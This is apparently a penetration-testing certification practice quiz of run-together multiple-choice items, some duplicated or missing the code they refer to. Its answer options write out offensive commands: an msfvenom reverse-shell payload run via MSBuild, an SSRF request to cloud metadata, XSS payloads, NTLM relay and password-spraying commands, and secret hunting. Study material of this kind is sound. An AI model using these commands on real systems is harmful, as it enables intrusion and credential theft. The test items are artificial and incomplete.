Pentest Test 1

A penetration tester wants to send a specific network packet with custom flags and sequence numbers to a vulnerable target. Which of the following should the tester use?. tcpreplay. Bluecrack. Scapy. tcpdump.

Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?. The tester is conducting a web application test. The tester is assessing a mobile application. The tester is evaluating a thick client application. The tester is creating a threat model.

A penetration tester is performing a security review of a web application. Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?. VM. IAST. DAST. SCA.

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent: Which of the following should the tester recommend in the report to best prevent this type of vulnerability?. Drop all excessive file permissions with chmod o-rwx. Ensure the requests application access logs are reviewed frequently. Disable the use of external entities. Implement a WAF to filter all incoming requests.

A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?. Shoulder surfing. Recon-ng. Social media. Password dumps.

A penetration tester needs to test a very large number of URLs for public access. Given the following code snippet: Which of the following changes is required?. The condition on line 6. The method on line 5. The import on line 1. The delimiter in line 3.

During a penetration test, a tester captures information about an SPN account. Which of the following attacks requires this information as a prerequisite to proceed?. Golden Ticket. Kerberoasting. DCShadow. LSASS dumping.

While performing an internal assessment, a tester uses the following command: crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@ Which of the following is the main purpose of the command?. To perform a pass-the-hash attack over multiple endpoints within the internal network. To perform common protocol scanning within the internal network. To perform password spraying on internal systems. To execute a command in multiple endpoints at the same time.

A penetration testing team needs to determine whether it is possible to disrupt the wireless communications for PCs deployed in the client's offices. Which of the following techniques should the penetration tester leverage?. Port mirroring. Sidecar scanning. ARP poisoning. Channel scanning.

Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?. Preserving artifacts. Reverting configuration changes. Keeping chain of custody. Exporting credential data.

A tester gains initial access to a server and needs to enumerate all corporate domain DNS records. Which of the following commands should the tester use?. dig +short A AAAA local.domain. nslookup local.domain. dig afxr @local.dns.server. nslookup -server local.dns.server local.domain *.

A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities. Which of the following techniques should the tester use?. Sniffing. Banner grabbing. TCP/UDP scanning. Ping sweeps.

A penetration tester reviews a SAST vulnerability scan report. The following lines of code have been reported as vulnerable: Which of the following is the best method to remediate this vulnerability?. Implementing a logging framework. Removing the five code lines reported with issues. Initiating a secure coding-awareness program with all the developers. Documenting the vulnerability as a false positive.

During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?. Burp Suite. Wireshark. Zed Attack Proxy. Metasploit.

A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine. Which of the following commands should the tester use to do this task from the tester's host?. attacker_host$ nmap -sT <target_cidr> | nc -n <compromised_host> 22. attacker_host$ mknod backpipe p attacker_host$ nc -l -p 8000 | 0 <backpipe | nc <target_cidr> 80 | tee backpipe. attacker_host$ nc -nlp 8000 | nc -n <target_cidr> attacker_host$ nmap -sT 127.0.0.1 8000. attacker_host$ proxychains nmap -sT <target_cidr>.

A penetration tester is unable to identify the Wi-Fi SSID on a client's cell phone. Which of the following techniques would be most effective to troubleshoot this issue?. Sidecar scanning. Channel scanning. Stealth Scanning. Static Analysis scanning.

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?. SQL Injection. SSRF. XSS. Server-side Template injection.

A penetration tester attempts unauthorized entry to the company’s server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?. Plug Spinner. Bypassing. Decoding. Raking.

Which of the following technologies is most likely used with badge cloning? (Choose two.). NFC. RFID. Bluetooth. Modbus. Zigbee. CAN bus.

During a penetration test of a web application, the tester gains full access to the application's source code. The application repository includes thousands of code files. Given that the assessment timeline is very short, which of the following approaches would allow the tester to identify hard-coded credentials most effectively?. Run TruffleHog against a local clone of the application. Scan the live web application using Nikto. Perform a manual code review of the Git repository. Use SCA software to scan the application source code.

A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?. Kiosk escape. Arbitrary code execution. Process hollowing. Library injection.

Given the following script: Which of the following is the penetration tester most likely trying to do?. Change the system's wallpaper based on the current user's preferences. Capture the administrator's password and transmit it to a remote server. Conditionally stage and execute a remote script. Log the internet browsing history for a systems administrator.

A penetration tester needs to collect information transmitted over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?. ntlmrelayx.py -t 192.168.1.0/24 -l 1234. nc -tulpn 1234 192.168.1.2. responder.py -I eth0 -wP. crackmapexec smb 192.168.1.0/24 -u "user" -p "pass123".

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?. regsvr32 /s /n /u C:\evil.xml. MSBuild.exe C:\evil.xml. mshta.exe C:\evil.xml. AppInstaller.exe C:\evil.xml.

A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be specified in the rules of engagement?. Testing window. Terms of service. Authorization letter. Shared responsibilities.

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitabilty?. curl <url>?param=http://169.254.169.254/latest/meta-data/. curl '<url>?param=http://127.0.0.1/etc/passwd'. curl '<url>?param=<script>alert(1}<script>/'. curl <url>?param=http://127.0.0.1/.

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitabilty?. curl <url>?param=http://169.254.169.254/latest/meta-data/. curl '<url>?param=http://127.0.0.1/etc/passwd'. curl '<url>?param=<script>alert(1}<script>/'. curl <url>?param=http://127.0.0.1/.

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output: Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?. responder -I eth0 -dwv ntlmrelayx.py -smb2support -tf <target>. msf > use exploit/windows/smb/ms17_010_psexec msf > <set options>msf>run. hydra -L administrator -P /path/topasswdlist smb: //<target>. nmap --script smb-brute.nse -p 445 <target>.

A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input: Which of the following attack types is most likely being used in the test?. MDK4. Smurf attack. FragAttack. SYN flood.

Which of the following describes the process of determining why a vulnerability scanner is not providing results?. Root cause analysis. Secure distribution. Peer review. Goal reprioritization.

A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information: The client is concerned about the availabilty of its consumer-facing production application. Which of the following hosts should the penetration tester select for additional manual testing?. Server 1. Server 2. Server 3. Server 4.

A penetration tester attempts to run an automated web-application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output: Which of the following actions should the tester take to get the scans to work properly?. Modify the scanner to slow down the scan. Change the source IP with a VPN. Modify the scanner to only use HTTP GET requests. Modify the scanner user agent.

During an assessment, a penetration tester runs the following command: setspn.exe -Q */* Which of the following attacks is the penetration tester preparing for?. LDAP injection. Pass-the-hash. Kerberoasting. Dictionary.

While conducting an assessment, a penetration tester identifies the details for several unreleased products announced at a company-wide meeting. Which of the following attacks did the tester most likely use to discover this information?. Eavesdropping. Bluesnarfing. Credential harvesting. SQL injection attack.

A penetration tester wants to attack a server, exhausting its resources and making it unavailable to legitimate users. Which of the following attacks would be best to achieve this result?. IP spoofing. TCP hijacking. Port redirection. SYN flooding.

During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanism on that system. The tester also discovers the endpoint is part of an Active Directory local domain. The tester’s main goal is to leverage credentials to authenticate into other systems within the Active Directory environment. Which of the following steps should the tester take to complete the goal?. Use Mimikatz to collect information about the accounts and try to authenticate in other systems. Use hasheat to crack a password for the local user on the compromised endpoint. Use Evil-WinRM to access other systems in the network within the endpoint credentials. Use Metasploit to create and execute a payload and try to upload the payload into other systems.

A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes. Which of the following steps should the tester take next?. Enable monitoring mode using Aircrack-ng. Use Kismet to automatically place the wireless dongle in monitor mode and collect handshakes. Run KARMA to break the password. Research WIGLE.net for potential nearby client access points.

A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?. IAST. SBOM. DAST. SAST.

A penetration tester reviews a SAST vulnerability scan report. The following vulnerability has been reported as high severity: The tester inspects the source file and finds the variable response is defined as a constant and is not referred to or used in other sections of the code. Which of the following describes how the tester should classify this reported vulnerability?. False negative. False positive. True positive. Low severity.

A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?. Browser Exploitation Framework. Maltego. Metasploit. theHarvester.

A penetration tester gains access to a Linux computer system. The tester then attempts to enumerate user accounts, including the directories and user default shell. Which of the following commands should the tester use to enumerate user accounts?. cat /etc/shadow. ls /var/usr. ls /home. cat /etc/passwd.

A client warns the assessment team that an ICS application is maintained by the manufacturer. Any tampering of the host could void the enterprise support terms of use. Which of the following techniques would be most effective to validate whether the application encrypts communications in transit?. Utilizing port mirroring on a firewall appliance. Installing packet capture software on the server. Reconfiguring the application to use a proxy. Requesting that certificate pinning be disabled.

While performing a penetration testing exercise, a tester executes the following command: PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe Which of the following best explains what the tester is trying to do?. Test connectivity using PSExec on the server01 using CMD.exe. Perform a lateral movement attack using PsExec. Send the PsExec binary file to the server01 using CMD.exe. Enable CMD.exe on the server01 through PsExec.

During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command: findstr /SIM /C:"pass” *.txt *.cfg *.xml Which of the following is the penetration tester trying to enumerate?. Configuration files. Permissions. Virtual hosts. Secrets.

A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?. Target 1: EPSS Score = 0.6 and CVSS Score = 4. Target 2: EPSS Score = 0.3 and CVSS Score = 2. Target 3: EPSS Score = 0.6 and CVSS Score = 1. Target 4: EPSS Score = 0.4 and CVSS Score = 4.5.

During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system: ?/<sCRitP>aLeRt("pwned")</ScriPt> Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?. Arbitrary code execution; the affected computer should be placed on a perimeter network. SQL injection attack; should be detected and prevented by a web application firewall. Cross-site request forgery; should be detected and prevented by a firewall. XSS obfuscated; should be prevented by input sanitization.

A penetration tester gains shell access to a Windows host. The tester needs to permanently turn off protections in order to install additional payload. Which of the following commands is most appropriate?. sc config <svc_name> start=disabled. sc query state= all. pskill <pid_svc_name>. net config <svc_name>.

A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester’s attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?. Apply UTF-8 to the data and send over a tunnel to TCP port 25. Apply Base64 to the data and send over a tunnel to TCP port 80. Apply 3DES to the data and send over a tunnel UDP port 53. Apply AES-256 to the data and send over a tunnel to TCP port 443.

A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool: Based on the output, which of the following services provides the best target for launching an attack?. Database. Remote access. Email. File sharing.

A penetration tester is performing a cloud-based penetration test against a company. Stakeholders have indicated the priority is to see if the tester can get into privileged systems that are not directly accessible from the internet. Given the following scanner information: Server-side request forgery vulnerability in test.comptia.org Reflected cross-site scripting vulnerability in test2.comptia.org Publicly accessible storage system named static_comptia_assets SSH port 22 open to the intemet on test3.comptia.org Open redirect vulnerability in test4.comptia.org Which of the following of the attack paths should the tester prioritize first?. Synchronize all the information from the public bucket and scan it with Trufflehog. Run Pacu to enumerate permissions and roles within the cloud-based systems. Perform a full dictionary brute-force attack against the open SSH service using Hydra. Use the reflected cross-site scripting attack within a phishing campaign to attack administrators. Leverage the SSRF to gain access to credentials from the metadata service.

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client's networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?. Covert data exfiltration. URL spidering. HTML scrapping. DoS attack.